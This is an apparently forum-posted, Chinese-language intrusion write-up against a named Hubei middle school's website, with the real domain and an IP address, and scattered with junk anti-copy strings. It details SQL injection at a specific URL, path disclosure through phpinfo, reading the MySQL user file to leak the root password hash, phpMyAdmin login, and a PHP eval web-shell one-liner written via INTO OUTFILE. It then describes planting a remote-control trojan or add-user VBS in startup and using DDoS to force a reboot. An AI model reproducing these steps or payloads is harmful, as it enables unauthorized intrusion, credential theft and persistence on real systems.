友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
7 w7 Y5 c8 |" @  N$ a( ^- L发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



0 ]2 g# S4 f9 C; G常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
4 D4 v3 D+ l1 U/ H
那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

- A% Q+ n1 o- \( y6 q' Q) F( c试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
6 _. @. D4 f& S9 K3./load_file()  
5 Z- {, Y+ M6 r) k* `; {* g4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
; q- J4 m% Q: _. Y9 O5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
+ r7 d8 H7 g+ G7./phpmyadmin/libraries/mcrypt.lib.php   
+ Z3 j- _. z; d6 b0 k9 s/ B8./phpmyadmin/libraries/export/xls.php  
4 w9 a( p2 Y5 ~  q3 R: Z
均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
9 N2 s; Q# U6 Y. I/ P# q; k
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
9 V7 s# d7 r. h0 }' O
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
& P& m; R/ c* A: e
8 O* \3 u  x& }- d' `敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
% v8 g1 v, Y( y& c% B. T: v
: m( T5 S% v, ?) ^7 C% M想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
) a- n4 Z" r$ @8 z$ a
7 X, @& d' M- i0 [$ j4 k. fhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

7 ~& J4 {# K6 D+ q, |, J自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

! J& p, H% k- Z- x: W17---- r(0072)
6 \8 k/ \2 r$ v2 a' V% ^8 P5 M18---- o(006f)
19---- o(006f)
' [, s8 }( Q" `- {8 f, J+ W1 M20---- t(0074)
  w' p! s" a# g$ t# P# V' \21---- *(002a)
% }! o7 q7 V" i, z7 `22---- 8(0038)
23---- 2(0032)
- p' k/ [/ [% C5 Z0 ]# M7 i24---- E(0045)
9 I$ ?2 K0 S) r+ v# f- y( x/ N25---- 1(0031)
26---- C(0043)
% D3 u$ T+ R5 ]1 e2 h' [27---- 5(0035)
* }2 R' R' N3 O8 I  L' y' d/ ?28---- 8(0038)
+ ~0 k1 d) \7 c* b/ x( b+ `29---- 2(0032)
30---- 8(0038)
, O5 D5 o/ m7 x4 ^0 C* l9 J31---- A(0041)
& D4 Y" E9 n7 H: H  x/ z# e32---- 9(0039)
33---- B(0042)
- z" q& K9 M( W( y$ V# f" y34---- 5(0035)
7 |6 o* u( P8 R/ R9 w( P5 Z35---- 4(0034)
36---- 8(0038)
5 ?7 v) u. ^& i  q37---- 6(0036)
0 ^8 E8 r& N( b$ Y! F& P( s/ T' }% t38---- 4(0034)
- s3 |& V& x0 |39---- 9(0039)
# D) {5 l4 x. M% n7 f40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
, c+ k7 t9 A# d! p( j) w; f8 ?44---- 5(0035)
' N' w$ k& `6 e( A3 \45---- 9(0039)
1 v: A) @) o- N7 j/ g" _! g46---- 8(0038)
: R& E7 N& x9 i" _2 [" O7 {6 Z47---- F(0046)
. H1 G) d- f5 g) H- P3 d48---- F(0046)
49---- 4(0034)
) N% M; Q3 `8 c50---- F(0046)
51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
( }3 J" ~* l# u5 e0 f" P! V( C* K  i54---- A(0041)
55---- 4(0034)
' B7 Z% A; ~/ f- }6 C' p) i56---- A(0041)
; i  ^+ l9 g( I57---- B(0042)
/ R: W7 R+ k. n" T0 |) j58---- *(0044)
6 [. Y" Q! C) _1 l9 u  c8 b59---- *(0035)
( @% Y# X+ Y' X60---- *(0041)
61---- *0032)
0 s$ O2 Q. O6 M9 j) b
解密后成功登陆phpmyamin
, ]: ~; j8 T) u4 r; \& {% b                          
3 \- f4 A! l4 x* d4 ?6 q
' w$ I. u2 N. I3 \# L% Y$ x                             

" O/ K# D* l/ Q; M; p4 C& A找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

" ?% C% R9 {& [1 u% R7 ~+ U成功执行，拿下shell，菜刀连接：

& X9 E4 q" A/ W/ n" o* p服务器不支持asp,aspx,php提权无果...................
" @! u8 L! m. l' e1 K
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
  Z% }# a  V" z9 r* T* o

服务器上已经有个隐藏帐号了

别名     administrators
5 [+ b7 p" _4 ?3 H4 [( p" _' i注释     管理员对计算机/域有不受限制的完全访问权

; n  w! z% o9 ]/ T( y

成员

-------------------------------------------------------------------------------
admin
' n! ~( n. a6 m  f7 d, zAdministrator
& u1 o8 O& X1 k4 d' O- \! Z1 Lslipper$
sqluser
命令成功完成。
4 ~# F2 K. [1 [. o& i& q
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................

5 W" \9 q" K2 I$ V0 I, m      

angel